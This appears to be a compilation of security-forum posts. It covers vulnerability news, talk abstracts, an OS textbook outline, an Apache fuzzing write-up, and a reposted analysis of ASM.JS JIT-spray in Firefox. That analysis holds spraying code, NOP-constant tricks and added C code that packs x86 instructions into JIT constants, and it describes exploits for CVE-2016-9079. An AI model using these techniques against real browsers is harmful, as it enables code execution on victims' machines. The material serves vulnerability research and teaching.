My name is Angelica, and I joined here to enrich my knowledge, but first of all I joined to find a way to solve a problem, namely: I am an operator on a certain chat, and I am having problems with an individual who insults me in the crudest terms... The guy has a dynamic IP and connects from AndroIRC. I banned him, but he comes back again. Please help me with some ideas, namely how I could pin down his IP, so that I can ban him in such a way that he doesn't come back. He constantly threatens that he will return, and so he does, coming back with the insults. Thank you very much. I hope a solution will be found. 1 point
-
https://github.com/xoreaxeaxeax/movfuscator I apologise for not pasting from GitHub; the link is enough in my humble opinion. Source where I discovered it: https://twitter.com/emilyst/status/886707159454461952 1 point
-
A highly critical vulnerability has been discovered in Cisco Systems' WebEx browser extension for Chrome and Firefox, for the second time this year, which could allow attackers to remotely execute malicious code on a victim's computer. Cisco WebEx is a popular communication tool for online events, including meetings, webinars and video conferences, that helps users connect and collaborate with colleagues around the world. The extension has roughly 20 million active users. Discovered by Tavis Ormandy of Google Project Zero and Cris Neckar of Divergent Security, the remote code execution flaw (CVE-2017-6753) is due to a design defect in the WebEx browser extension. To exploit the vulnerability, all an attacker needs to do is trick victims into visiting a web page containing specially crafted malicious code through a browser with the affected extension installed. Successful exploitation of this vulnerability could result in the attacker executing arbitrary code with the privileges of the affected browser and gaining control of the affected system. Cisco has already patched the vulnerability and released the "Cisco WebEx Extension 1.0.12" update for Chrome and Firefox browsers that addresses this issue, though "there are no workarounds that address this vulnerability." Download Cisco WebEx Extension 1.0.12: Chrome Extensions, Firefox Extension. In general, users are always recommended to run all software as a non-privileged user in an effort to diminish the effects of a successful attack. Fortunately, Apple's Safari, Microsoft's Internet Explorer and Microsoft's Edge are not affected by this vulnerability. Cisco WebEx Productivity Tools, Cisco WebEx browser extensions for Mac or Linux, and Cisco WebEx on Microsoft Edge or Internet Explorer are not affected by the vulnerability, the company confirmed. This is the second time this year that a remote code execution vulnerability has been discovered in the Cisco WebEx extension.
Ormandy alerted the networking giant to an RCE flaw in the WebEx browser extension earlier this year as well, which even led to Google and Mozilla temporarily removing the add-on from their stores. Via thehackernews.com 1 point
-
The guy who made this is brilliant. A hacker in the true sense of the word. 1 point
-
Published on Jul 17, 2017. Java Serialization is commonly used by large-scale enterprise applications and presents significant opportunities for attacks that often lead to unauthenticated remote command execution against the underlying application servers. While serialization exploits are not new, identifying and exploiting serialization vulnerabilities can be more involved than other common vulnerabilities. During this talk I'll look at some real attacks against Java serialization and demonstrate how to identify and attack serialization vulnerabilities to reap the rewards of RCE. 1 point
-
Published on Jul 17, 2017. This talk illustrates a number of techniques to smuggle and reshape HTTP requests using features such as HTTP Pipelining that are not normally used by testers. The strange behaviour of web servers with different technologies will be reviewed using HTTP versions 1.1, 1.0, and 0.9 before HTTP v2 becomes too popular! Some of these techniques might come in handy when dealing with a dumb WAF or load balancer that blocks your attacks. 1 point
-
Ban the IP class he is in, but it's a bit awkward because you ban all the users of that class ... E.g.: 123.456.78.90. Whole class: 123.0.0.0, meaning everything under "123"; 123.456.0.0, meaning everything under "123.456". 1 point
-
The Return of the JIT (Part 1)

TL;DR: This is the story about ASM.JS JIT-Spray in Mozilla Firefox (x86) on Windows, tracked as CVE-2017-5375 and CVE-2017-5400. It allows DEP and ASLR to be fully bypassed.

I always liked the idea of JIT-Spray since the first time I saw it being used for Flash in 2010. Just to name a few, JIT-Spray has been used to exploit bugs in Apple Safari, create info leak gadgets in Flash, attack various other client software, and has even abused Microsoft's WARP Shader JIT Engine. @asintsov wrote in 2010: Yes, the idea will never die, and from time to time JIT-Spray reappears…

JIT-Spray

It greatly simplifies exploiting a memory corruption bug such as a use-after-free, because the attacker only needs to hijack the instruction pointer and jump to JIT-Sprayed shellcode. There is no need to disclose code locations or base addresses of DLLs, and there is no need for any code-reuse. JIT-Spray is usually possible when: (1) machine code can be hidden within constants of a high-level language such as JavaScript (this bypasses DEP); (2) the attacker is able to force the JIT compiler to emit the constants into many executable code regions whose addresses are predictable (this bypasses ASLR). For example, to achieve (1), we can inject NOPs (0x90) in ASM.JS code with:

Injecting NOPs with ASM.JS constants
VAL = (VAL + 0xA8909090)|0;
VAL = (VAL + 0xA8909090)|0;

Firefox's ASM.JS compiler generates the following x86 machine code:

Native x86 code generated from ASM.JS
00: 05909090A8 ADD EAX, 0xA8909090
05: 05909090A8 ADD EAX, 0xA8909090

When we jump to offset 01 (the middle of the first instruction) we can execute our hidden code:

Hidden instructions within emitted x86 code
01: 90   NOP
02: 90   NOP
03: 90   NOP
04: A805 TEST AL, 05
06: 90   NOP
07: 90   NOP
08: 90   NOP
09: A8...

Thus, in our four-byte constants, we have three bytes to hide our code and one byte (0xA8) to wrap the ADD EAX, … instruction into the NOP-like instruction TEST AL, 05.
To achieve condition (2), i.e., to create many executable regions containing our code, we request the ASM.JS module many times:

ASM.JS JIT-Sprayer
function asm_js_module(){
    "use asm"
    function asm_js_function(){
        /* attacker controlled asm.js code */
    }
    return asm_js_function
}
modules = []
/* create 0x1000 executable regions containing our code */
for (i=0; i<=0x1000; i++){
    modules[i] = asm_js_module() // request asm.js module
}

Technically, ASM.JS is an ahead-of-time (AOT) compiler and not a just-in-time (JIT) compiler. Hence, the function asm_js_function() doesn't need to be called to get your machine code injected into memory at predictable addresses. It is sufficient to load a web page containing the ASM.JS script.

The Flaw

Each time an ASM.JS module is requested, CodeSegment::create() is called, which in turn calls AllocateCodeSegment() in firefox-50.1.0/js/src/asmjs/WasmCode.cpp line #206 (based on the source of Firefox 50.1.0):

firefox-50.1.0/js/src/asmjs/WasmCode.cpp (CodeSegment::create)
191 /* static */ UniqueCodeSegment
192 CodeSegment::create(JSContext* cx,
193                     const Bytes& bytecode,
194                     const LinkData& linkData,
195                     const Metadata& metadata,
196                     HandleWasmMemoryObject memory)
197 {
198     MOZ_ASSERT(bytecode.length() % gc::SystemPageSize() == 0);
199     MOZ_ASSERT(linkData.globalDataLength % gc::SystemPageSize() == 0);
200     MOZ_ASSERT(linkData.functionCodeLength < bytecode.length());
201
202     auto cs = cx->make_unique<CodeSegment>();
203     if (!cs)
204         return nullptr;
205
206     cs->bytes_ = AllocateCodeSegment(cx, bytecode.length() + linkData.globalDataLength);

AllocateCodeSegment() further calls AllocateExecutableMemory() in line #67:

firefox-50.1.0/js/src/asmjs/WasmCode.cpp (AllocateCodeSegment)
58 AllocateCodeSegment(ExclusiveContext* cx, uint32_t totalLength)
59 {
60     if (wasmCodeAllocations >= MaxWasmCodeAllocations)
61         return nullptr;
62
63     // Allocate RW memory. DynamicallyLinkModule will reprotect the code as RX.
64     unsigned permissions =
65         ExecutableAllocator::initialProtectionFlags(ExecutableAllocator::Writable);
66
67     void* p = AllocateExecutableMemory(nullptr, totalLength, permissions,
68                                        "wasm-code-segment", gc::SystemPageSize());

Finally, AllocateExecutableMemory() invokes VirtualAlloc(), which returns a new RW (PAGE_READWRITE) region aligned to a 64KB boundary (0xXXXX0000) (firefox-50.1.0/js/src/jit/ExecutableAllocatorWin.cpp, line #190).

firefox-50.1.0/js/src/jit/ExecutableAllocatorWin.cpp (AllocateExecutableMemory)
179 void*
180 js::jit::AllocateExecutableMemory(void* addr, size_t bytes, unsigned permissions, const char* tag,
181                                   size_t pageSize)
182 {
183     MOZ_ASSERT(bytes % pageSize == 0);
184
185 #ifdef JS_CPU_X64
186     if (sJitExceptionHandler)
187         bytes += pageSize;
188 #endif
189
190     void* p = VirtualAlloc(addr, bytes, MEM_COMMIT | MEM_RESERVE, permissions);

If we set a breakpoint on VirtualAlloc() in WinDbg, we get the following call stack during runtime (Firefox 50.1.0):

Stack trace in WinDbg
0:000> kP a
 # ChildEBP RetAddr
00 008fe060 670ef66e KERNEL32!VirtualAllocStub
01 (Inline) -------- xul!js::jit::AllocateExecutableMemory+0x10 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\jit\executableallocatorwin.cpp @ 190]
02 008fe078 670f65c7 xul!AllocateCodeSegment( class js::ExclusiveContext * cx = 0x04516000, unsigned int totalLength = <Value unavailable error>)+0x23 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\asmjs\wasmcode.cpp @ 67]
03 008fe0b8 670de070 xul!js::wasm::CodeSegment::create( struct JSContext * cx = 0x04516000, class mozilla::Vector<unsigned char,0,js::SystemAllocPolicy> * bytecode = 0x08c61008, struct js::wasm::LinkData * linkData = 0x08c61020, struct js::wasm::Metadata * metadata = 0x06ab68d0, class JS::Handle<js::WasmMemoryObject *> memory = class JS::Handle<js::WasmMemoryObject *>)+0x67 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\asmjs\wasmcode.cpp @ 206]
04 008fe184 6705f99d xul!js::wasm::Module::instantiate( struct JSContext * cx = 0x04516000, class JS::Handle<JS::GCVector<JSFunction *,0,js::TempAllocPolicy> > funcImports = class JS::Handle<JS::GCVector<JSFunction *,0,js::TempAllocPolicy> >, class JS::Handle<js::WasmTableObject *> tableImport = class JS::Handle<js::WasmTableObject *>, class JS::Handle<js::WasmMemoryObject *> memoryImport = class JS::Handle<js::WasmMemoryObject *>, class mozilla::Vector<js::wasm::Val,0,js::SystemAllocPolicy> * globalImports = 0x008fe200, class JS::Handle<JSObject *> instanceProto = class JS::Handle<JSObject *>, class JS::MutableHandle<js::WasmInstanceObject *> instanceObj = class JS::MutableHandle<js::WasmInstanceObject *>)+0x94 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\asmjs\wasmmodule.cpp @ 689]
05 008fe260 6705aae6 xul!TryInstantiate( struct JSContext * cx = 0x04516000, class JS::CallArgs args = class JS::CallArgs, class js::wasm::Module * module = 0x08c61000, struct js::AsmJSMetadata * metadata = 0x06ab68d0, class JS::MutableHandle<js::WasmInstanceObject *> instanceObj = class JS::MutableHandle<js::WasmInstanceObject *>, class JS::MutableHandle<JSObject *> exportObj = class JS::MutableHandle<JSObject *>)+0x1e6 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\asmjs\asmjs.cpp @ 7894]
06 008fe2c4 35713638 xul!InstantiateAsmJS( struct JSContext * cx = 0x04516000, unsigned int argc = 0, class JS::Value * vp = 0x008fe2f0)+0x88 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\asmjs\asmjs.cpp @ 8008]

After returning into method CodeSegment::create(), the ASM.JS compiled/native code is copied to the RW region (firefox-50.1.0/js/src/asmjs/WasmCode.cpp, line #223).
And in line #229 the RW region is made executable (PAGE_EXECUTE_READ) with ExecutableAllocator::makeExecutable() invoking VirtualProtect().

firefox-50.1.0/js/src/asmjs/WasmCode.cpp making ASM.JS code executable (in CodeSegment::create)
223         memcpy(cs->code(), bytecode.begin(), bytecode.length());
224         StaticallyLink(*cs, linkData, cx);
225         if (memory)
226             SpecializeToMemory(*cs, metadata, memory);
227     }
228
229     if (!ExecutableAllocator::makeExecutable(cs->code(), cs->codeLength())) {

Requesting one ASM.JS module many times leads to the creation of many RX regions. Due to the allocation granularity of VirtualAlloc (64KB) we can then choose a fixed address (such as 0x1c1c0000) and be certain that the emitted machine code is located there (containing our hidden payload). The astute reader might have noticed that constant blinding is missing, which is what allows ASM.JS constants to be emitted as x86 code in the first place.

Show me a PoC!

Let's see how a proof of concept looks in practice: we hide our payload within ASM.JS constants and request the ASM.JS module many times. Hence, we spray many executable code regions to occupy predictable addresses. The payload consists of two parts:
Very large NOP-sled (line #35 to #74): to hit it, we can choose a predictable address, such as 0x1c1c0053, and set EIP to it.
Shellcode (line #75 to #152): it resolves kernel32!WinExec() and executes cmd.exe.
The payload strictly contains at most three-byte long instructions, except MOVs, which are handled differently. It was automatically generated by a custom transformation tool, shellcode2asmjs, which uses the Nasm assembler and the Distorm3 disassembler. The payload is strongly inspired by Writing JIT-Spray-Shellcode.
As no memory corruption is abused in this PoC, you have to set EIP in your favorite debugger when you are prompted to.

Exploiting a former Tor-Browser 0day with ASM.JS JIT-Spray

Let's take a real memory corruption (CVE-2016-9079) and see how super easy exploitation becomes when using ASM.JS JIT-Spray. This use-after-free has been analyzed thoroughly, so most of the hard work to write a custom exploit was already done. Note: We target Firefox 50.0.1 and not 50.1.0 as above. In addition to JIT-Spraying executable regions, the following steps are conducted:
We use the bug-trigger from the bug report (line #296 to #372).
We heap-spray a fake object (line #258 to #281). During runtime, the chosen values in our fake object drive the execution to a program path with an indirect call. There, EIP is set with the address of one JIT-Sprayed region (0x1c1c0054).
As soon as the bug is triggered, the JIT-sprayed payload is executed and cmd.exe should pop up. That's all. The full exploit targets Mozilla Firefox 50.0.1, and we don't need any information-leaks and code-reuse. Note that the Tor-Browser has ASM.JS disabled by default, and hence, ASM.JS JIT-Spray won't work unless the user enables it. I wonder if Endgame's HA-CFI catches this exploit?

Dynamic Payloads

The above exploits contain "hardcoded" payloads within constants. That makes it kind of cumbersome to use different shellcodes. However, we can generate ASM.JS scripts on the fly and invoke them during runtime. A PoC where payloads are exchangeable uses the following:
JavaScript code creates ASM.JS script-code dynamically. The ASM.JS script is included with the Blob JavaScript API (line #88 to #137).
A custom VirtualAlloc stage0. It allocates RWX pages and copies the actual stage1 payload (i.e. metasploit shellcode) to it. Afterwards, stage0 jumps to stage1 (line #53 to #69).
This way, you can replace the payload with your favorite shellcode of choice (line #33).
The PoC and especially the stage0 payload were also auto-generated with the custom shellcode2asmjs tool.

The Incomplete Fix

Mozilla fixed this issue in Firefox 51 on Jan. 24, 2017. However, the fix can be bypassed, which resulted in CVE-2017-5400. This will be explained in part 2.

Posted by Rh0, advisory, exploit
Source: https://rh0dev.github.io/blog/2017/the-return-of-the-jit/
1 point
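An added example of the constant-packing step the post describes (this is not Rh0's shellcode2asmjs tool and not code from the post): given x86 instructions of at most three bytes, it builds the 32-bit constants and then checks that the code a JIT would emit for them decodes back to the payload when entered one byte in. It assumes, as classic JIT-spray does, that the JIT emits each constant as mov eax, imm32 (opcode B8 followed by the little-endian immediate) and uses test al, imm8 (A8) as the filler byte that swallows the next opcode; neither the exact instruction SpiderMonkey's ASM.JS backend selects nor the asm.js syntax for placing the constants is shown on the page, so both are assumptions here.

```c
/* Added example, not Rh0's shellcode2asmjs tool: how short x86 instructions
 * are hidden in 32-bit constants when the JIT does no constant blinding.
 *
 * Assumptions (not stated on the page): the JIT emits each constant as a
 * five-byte "mov eax, imm32" (opcode 0xB8 followed by the little-endian
 * immediate), and the sprayed region is entered at offset +1 so execution
 * starts inside the first immediate.  Each immediate then carries three
 * payload bytes and a trailing 0xA8 ("test al, imm8"), which swallows the
 * next 0xB8 opcode as its operand, so control falls through to the next
 * constant's payload bytes.  Instructions longer than three bytes are not
 * handled here; the blog's tool treats MOVs separately for that reason. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define JIT_MOV_OPCODE 0xB8u  /* assumed "mov eax, imm32" opcode byte */
#define FILLER_TEST_AL 0xA8u  /* "test al, imm8": consumes the following 0xB8 */
#define X86_NOP        0x90u

/* Pack one instruction of 1..3 bytes into a constant: payload bytes first,
 * NOP padding, filler byte in the most significant position. Returns 0 for
 * an instruction that does not fit (the caller must split or rewrite it). */
uint32_t pack_insn(const uint8_t *insn, size_t len)
{
    uint8_t b[4] = { X86_NOP, X86_NOP, X86_NOP, FILLER_TEST_AL };
    if (len == 0 || len > 3)
        return 0;
    memcpy(b, insn, len);
    return (uint32_t)b[0] | ((uint32_t)b[1] << 8) |
           ((uint32_t)b[2] << 16) | ((uint32_t)b[3] << 24);
}

/* Simulate the JIT: emit "B8 imm32" for every constant. Returns the number
 * of bytes written, or 0 if `cap` is too small. */
size_t emit_jit(const uint32_t *consts, size_t n, uint8_t *out, size_t cap)
{
    size_t off = 0;
    for (size_t i = 0; i < n; i++) {
        if (off + 5 > cap) return 0;
        out[off++] = JIT_MOV_OPCODE;
        for (int k = 0; k < 4; k++)           /* little-endian immediate */
            out[off++] = (uint8_t)(consts[i] >> (8 * k));
    }
    return off;
}

/* Walk the emitted code the way the CPU does when entered at offset +1 and
 * collect the payload stream. Returns the number of payload bytes, or 0 if
 * the filler/opcode interleaving is broken anywhere (a desynchronised
 * decoder would execute arbitrary bytes instead of the sled). */
size_t recover_payload(const uint8_t *code, size_t n, uint8_t *out, size_t cap)
{
    size_t got = 0;
    for (size_t off = 1; off + 3 < n; off += 5) {   /* off = first imm byte */
        if (got + 3 > cap) return 0;
        memcpy(out + got, code + off, 3);
        got += 3;
        if (code[off + 3] != FILLER_TEST_AL) return 0;              /* filler? */
        if (off + 4 < n && code[off + 4] != JIT_MOV_OPCODE) return 0; /* opcode eaten? */
    }
    return got;
}

int main(void)
{
    /* Constructed sample payload: xor eax,eax ; inc eax ; nop nop nop. */
    const uint8_t xor_eax[] = { 0x31, 0xC0 }, inc_eax[] = { 0x40 },
                  nops[]    = { 0x90, 0x90, 0x90 };
    uint32_t consts[3] = { pack_insn(xor_eax, 2), pack_insn(inc_eax, 1),
                           pack_insn(nops, 3) };
    uint8_t code[32], payload[16];

    for (int i = 0; i < 3; i++)
        printf("ASM.JS constant %d: 0x%08x\n", i, (unsigned)consts[i]);
    size_t n = emit_jit(consts, 3, code, sizeof code);
    size_t got = recover_payload(code, n, payload, sizeof payload);
    printf("emitted %zu bytes, recovered %zu payload bytes\n", n, got);
    return got == 9 ? 0 : 1;
}
```

The recover step is the check the post leaves implicit: if any constant's top byte is not the filler, or the JIT chooses a different opcode than assumed, the sled desynchronises and the "NOP-sled" becomes a crash. A NOP-sled in this scheme is simply the constant 0xA8909090 repeated.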
-
Writing a Simple Operating System — from Scratch
by Nick Blundell, School of Computer Science, University of Birmingham, UK
Draft: December 2, 2010. Copyright (c) 2009–2010 Nick Blundell

Contents

1 Introduction
2 Computer Architecture and the Boot Process
  2.1 The Boot Process
  2.2 BIOS, Boot Blocks, and the Magic Number
  2.3 CPU Emulation
    2.3.1 Bochs: A x86 CPU Emulator
    2.3.2 QEmu
  2.4 The Usefulness of Hexadecimal Notation
3 Boot Sector Programming (in 16-bit Real Mode)
  3.1 Boot Sector Re-visited
  3.2 16-bit Real Mode
  3.3 Erm, Hello?
    3.3.1 Interrupts
    3.3.2 CPU Registers
    3.3.3 Putting it all Together
  3.4 Hello, World!
    3.4.1 Memory, Addresses, and Labels
    3.4.2 'X' Marks the Spot
      Question 1
    3.4.3 Defining Strings
    3.4.4 Using the Stack
      Question 2
    3.4.5 Control Structures
      Question 3
    3.4.6 Calling Functions
    3.4.7 Include Files
    3.4.8 Putting it all Together
      Question 4
    3.4.9 Summary
  3.5 Nurse, Fetch me my Steth-o-scope
    3.5.1 Question 5 (Advanced)
  3.6 Reading the Disk
    3.6.1 Extended Memory Access Using Segments
    3.6.2 How Disk Drives Work
    3.6.3 Using BIOS to Read the Disk
    3.6.4 Putting it all Together
4 Entering 32-bit Protected Mode
  4.1 Adapting to Life Without BIOS
  4.2 Understanding the Global Descriptor Table
  4.3 Defining the GDT in Assembly
  4.4 Making the Switch
  4.5 Putting it all Together
5 Writing, Building, and Loading Your Kernel
  5.1 Understanding C Compilation
    5.1.1 Generating Raw Machine Code
    5.1.2 Local Variables
    5.1.3 Calling Functions
    5.1.4 Pointers, Addresses, and Data
  5.2 Executing our Kernel Code
    5.2.1 Writing our Kernel
    5.2.2 Creating a Boot Sector to Bootstrap our Kernel
    5.2.3 Finding Our Way into the Kernel
  5.3 Automating Builds with Make
    5.3.1 Organising Our Operating System's Code Base
  5.4 C Primer
    5.4.1 The Pre-processor and Directives
    5.4.2 Function Declarations and Header Files
6 Developing Essential Device Drivers and a Filesystem
  6.1 Hardware Input/Output
    6.1.1 I/O Buses
    6.1.2 I/O Programming
    6.1.3 Direct Memory Access
  6.2 Screen Driver
    6.2.1 Understanding the Display Device
    6.2.2 Basic Screen Driver Implementation
    6.2.3 Scrolling the Screen
  6.3 Handling Interrupts
  6.4 Keyboard Driver
  6.5 Hard-disk Driver
  6.6 File System
7 Implementing Processes
  7.1 Single Processing
  7.2 Multi-processing
8 Summary
Bibliography

Download: http://www.cs.bham.ac.uk/~exr/lectures/opsys/10_11/lectures/os-dev.pdf
1 point
-
Sunday, 16 July 2017

From fuzzing Apache httpd server to CVE-2017-7668 and a $1500 bounty

Intro

In the previous post I thoroughly described how to fuzz Apache's httpd server with American Fuzzy Lop. After writing that post, to my surprise, I got a few crashing test cases. I say "to my surprise" because anybody who managed to get some good test cases could have done it before me and, despite that, I was the first in reporting such a vulnerability. So here's the blog of it!

Goal

After seeing Apache httpd server crashing under AFL, lots of problems arise, such as the crashing test cases not crashing outside of the fuzzer, the stability of the fuzzed program going way down, etc. In this blog post we will try to give an explanation to such happenings while showing how to get the bug and, finally, we will shed some light on the crash itself.

Takeaways for the reader

- Test cases scraped from Wikipedia
- Bash-fu Taos
- Valgrind for triage
- Valgrind + gdb: learn to not always trust Valgrind
- rr

The test cases

Since this was just a testing case for myself to fuzz network based programs with AFL, I did not bother too much with getting complex test cases or ones that had a lot of coverage. So, in order to get a few test cases that would cover a fair amount of a vanilla installation of Apache's httpd server, I decided to look up an easy way to scrape all the headers from the List of headers - Wiki Page.

Bash-fu Tao 1: Butterfly knife cut

The first thing I did is just copy-paste the two tables under Request Fields into a text file with your editor of choice. It is important that your editor of choice doesn't replace tabs with spaces or the cut command will lose all its power. I chose my file to be called "wiki-http-headers" and after populating it, we can select the third column of the tables with the following. Remember that the default delimiter for cut is the TAB character:

    cat wiki-http-headers | cut -f3 | grep ":" | sed "s#Example....##g" | sort -u

We can see that some headers are gone, such as the TSV header. I ignored such and went on to fuzzing since coverage was not my concern - the real goal was to fuzz. Maybe you can find new 0-days with the missing headers! Why not?

Bash-fu Tao 2: Chain punching with "for"

Now that we have learned our first Tao, it is time to iterate on each header and create a test case per line. Avid bash users will already know how to do this, but for newcomers and learners here's how:

    a=0 && IFS=$'\n' && for header in $(cat wiki-http-headers | cut -f3 | grep ":" | sort -u); do echo -e "GET / HTTP/1.0\r\n$header\r\n\r\n" > "testcase$a.req"; a=$(($a+1)); done && unset IFS

Let me explain such an abomination quickly. There is a thing called the Internal Field Separator (IFS) which is an environment variable holding the tokens that delimit fields in bash. The IFS by default in bash considers the space, the tab and the newline. Those separators will interfere with headers when encountering spaces because the for command in bash iterates over a given list of fields (fields are separated by the IFS) - this is why we need to set the IFS to just the newline. Now we are ready to just iterate and echo each header to a different file (the a variable helps to dump each header to a file with a different name).

Bash-fu Tao Video

Here is one way to approach the full bash-fu Taos:

The fuzzing

Now that we have gathered a fair amount of (rather basic) test cases we can start our fuzzing sessions. This section is fairly short as everything on how to fuzz Apache httpd is explained in the previous post. However, the minimal steps are:

- Download apr, apr-utils, nghttp2, pcre-8 and Apache httpd 2.4.25
- Install the following dependencies: sudo apt install pkg-config; sudo apt install libssl-dev
- Patch Apache httpd
- Compile with the appropriate flags and installation path (PREFIX environment variable)

Now it all should be ready and set up to start fuzzing Apache httpd. As you can see in the following video, with a bit of improved test cases the crash doesn't take long to come up:

It is worth mentioning that I cheated a bit for this demo as I had already introduced a test case I knew would make it crash "soon". How I obtained the crashing test case was through a combination of honggfuzz, radamsa and AFL while checking the stability + "variable behaviour" folder of AFL.

The crashing

Disappointment

First things first. When having a crashing test case it is mandatory to test if it is a false positive or not, right? Let's try it:

Euh... it doesn't crash outside Apache. What could be happening?

Troubleshooting

There are a few things to test against here...

- First of all we are fuzzing in persistent mode: This means that maybe our test case did make the program crash but that it was one of many. In our case the __AFL_LOOP variable was set to over 9000 (a bit too much to be honest). For those that don't know what said variable is for, it is the number of fuzzing iterations that AFL will run before restarting the whole process. So, in the end, the crashing test case AFL discovered would need to be launched, in a worst case scenario, as follows: launch all other non-crashing 8999 inputs and then launch the crashing one (i.e. the last test case), number 9000.
- The second thing to take into account is the stability that AFL reports: The stability keeps going lower and lower. Usually (if you have read the readme from AFL you can skip this part) low stability could be due either to the use of random values (or use of date functions, hint hint) in your code or to the usage of uninitialised memory. This is key to our bug.
- The third and last (and least in our case) would be the memory assigned to our fuzzed process: In this case the memory is unlimited as we are running afl with "-m none", but in other cases it can be an indicator of overflows (stack or heap based) and access to unallocated memory.

Narrowing down the 9000

To test against our first assumption we need more crashing cases. To do so we just need to run AFL with our "crashing" test case only. It will take no time to find new paths/crashes which will help us narrow down our over 9000 inputs to a much lower value. Now, onto our second assumption...

Relationship goals: Stability

When fuzzing, we could check that stability was going down as soon as AFL was getting more and more into crashing test cases - we can tell there is some kind of correlation between the crashes and memory. To test if we are actually using uninitialised memory we can use a very handy tool called...

Valgrind

Valgrind is composed of a set of instrumentation tools to do dynamic analysis of your programs. By default, it is set to run "memcheck", a tool to inspect memory management. To install Valgrind on my Debian 8 I just needed to install it straight from the repositories:

    sudo apt install valgrind

After doing that we need to run Apache server under Valgrind with:

    NO_FUZZ=1 valgrind -- /usr/local/apache-afl-persist/bin/httpd -X

The NO_FUZZ environment variable is read by the code in the patch to prevent the fuzzing loop from kicking in. After this we need to launch one of our "crashing" test cases into Apache server running under Valgrind and, hopefully, our second assumption about usage of uninitialised memory will be confirmed:

We can confirm that, yes, Apache httpd is making use of uninitialised values but, still... I wasn't happy that Apache wouldn't crash, so let's use our Bash-fu Tao 2 to iterate over each test case and launch it against Apache.

Good good, it's crashing now! We can now proceed to do some basic triage.

The triage

Let's do a quick analysis and see which (spoiler) header is the guilty one...

gdb + valgrind

One cool feature about valgrind is that it will let you analyse the state of the program when an error occurs. We can do this through the --vgdb-error=1 flag. This flag will tell valgrind to stop execution on the first error reported and will wait for a debugger to attach to it. This is perfect for our case since it seems that we are accessing uninitialised values and accessing values outside of a buffer (out-of-bounds read), which is not a segfault but still is an error under valgrind. To use this feature, first we need to run in one shell:

    NO_FUZZ=1 valgrind --vgdb-error=0 -- /usr/local/apache_afl_blogpost/bin/httpd -X

Then, in a second separate shell, we send our input that triggers the bug:

    cat crashing-testcase.req | nc localhost 8080

Finally, in a third shell, we run gdb and attach through valgrind's command:

    target remote | /usr/lib/valgrind/../../bin/vgdb

We are now inspecting what is happening inside Apache at the exact point of the error:

Figure 1 - Inspecting on first valgrind reported error.

As you can see the first reported error is on line 1693. Our intuition tells us it is going to be the variable s as it is being increased without any "proper" checks, apart from the *s instruction, which will be true unless it points to a null value. Since s is optimised out at compile time, we need to dive into the backtrace by going up one level and inspecting the conn variable which is the one that s will point to. It is left as an exercise for the reader as to why the backtrace shown by pwndbg is different than the one shown by the "bt" command.

For the next figures, keep in mind the 2 highlighted values on Figure 1: 0x6e2990c and 8749.

Here is where, for our analysis, the number from Figure 1, 8749, makes sense as we can see that the variable conn is allocated with 8192 bytes at 0x6e2990c. We can tell that something is wrong as 8749 is way past the allocated 8192 bytes.

This is how we calculated the previous 8749 bytes. We stepped into the next error reported by valgrind by issuing the gdb "continue" command and letting it error out. There was an invalid read at 0x6e2bb39 and the initial pointer to the "conn" variable was at 0x6e2990c. Remember that s is optimized out so we need to do some math here as we can't get the real pointer from s at debugging time. That said, we need to get the offset with:

    invalid_read_offset = valgrind_error_pointer - conn

which is:

    8749 = 0x6e2bb39 - 0x6e2990c

rr - Record & Replay Framework

During the process of the triage, one can find several happenings that can hinder the debugging process: Apache will stop out of nowhere (haven't managed to get the reason why), valgrind will make it crash on parts where it is not supposed to because of it adding its own function wrappers, the heap will be different on valgrind debugging sessions than on plain gdb or vanilla runs, etc. Here is where the Record & Replay Framework comes in handy: deterministic replaying of the program's state. You can even replay the execution backwards which, in our case, is totally awesome! Must say I discovered this tool thanks to a good friend and colleague of mine, Symeon Paraschoudis, who introduced this marvellous piece of software to me. Let's cause the segmentation fault while recording with rr and replay the execution:

Full analysis is not provided as it is outside of the scope of this post.

Conclusions

We have learned how to use bash to effectively scrape stuff as test cases from the web and to believe that, even though hundreds of people might be fuzzing a certain piece of software, we can still add our value when using the right combination of tools, mutations and knowledge. Tools have been discovered along the way that will aid and help further triage. Stay tuned for the search of animal 0day! Cross-posts from the SensePost blog upcoming with challenges on heap-exploitation!

Post-Scriptum

I am willing to donate the $1500 bounty I received from the Internet Bug Bounty to any organisation related to kids' schooling and, especially, those teaching and providing means regarding Information Technologies. Knowledge is Power! So tune in and leave your suggestions in the comment section below; I have thought of ComputerAid, any opinions on this?

Posted by Javier Jiménez at 14:24
Source: https://animal0day.blogspot.ro/2017/07/from-fuzzing-apache-httpd-server-to-cve.html
1 point
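An added, constructed illustration of the bug class the triage above points at (this is not Apache's source and not code from the post): a scan that advances s until it meets a NUL, shown beside the bounded form, with the 8192-byte allocation and the 8749-byte offset from Figure 1 reproduced on a buffer this program owns. The separator character and the arena layout are assumptions made for the demo; the numbers are the post's.

```c
/* Added example (a constructed illustration, not Apache's source): the bug
 * class the post triages, a scanner that advances `s` until it meets a NUL
 * and therefore reads past a buffer that is not NUL-terminated.  The numbers
 * mirror Figure 1: an 8192-byte allocation and an invalid read 8749 bytes
 * in.  The demonstration only over-reads inside a larger arena this program
 * owns, so it is safe to run; on a real heap Valgrind reports the same walk
 * as use of uninitialised values followed by an invalid read. */
#include <stddef.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

#define CONN_BUF_SIZE    8192   /* size of the allocation in the post */
#define STRAY_NUL_OFFSET 8749   /* where the unbounded scan finally stops */

/* Vulnerable pattern: the only stop conditions are *s == '\0' or the
 * separator, so a buffer containing neither is scanned until some byte
 * outside it happens to be zero. Returns the offset where the scan stopped. */
size_t scan_unbounded(const char *buf, char sep)
{
    const char *s = buf;
    while (*s && *s != sep)
        s++;
    return (size_t)(s - buf);
}

/* Hardened pattern: the caller passes the buffer length and the scan can
 * never leave [buf, buf + len). Returns the offset of sep/NUL, or len if
 * neither occurs. */
size_t scan_bounded(const char *buf, size_t len, char sep)
{
    size_t i = 0;
    while (i < len && buf[i] != '\0' && buf[i] != sep)
        i++;
    return i;
}

/* Bytes read beyond the allocation for a scan that stopped at `stop`
 * (the post's invalid_read_offset minus the allocation size). */
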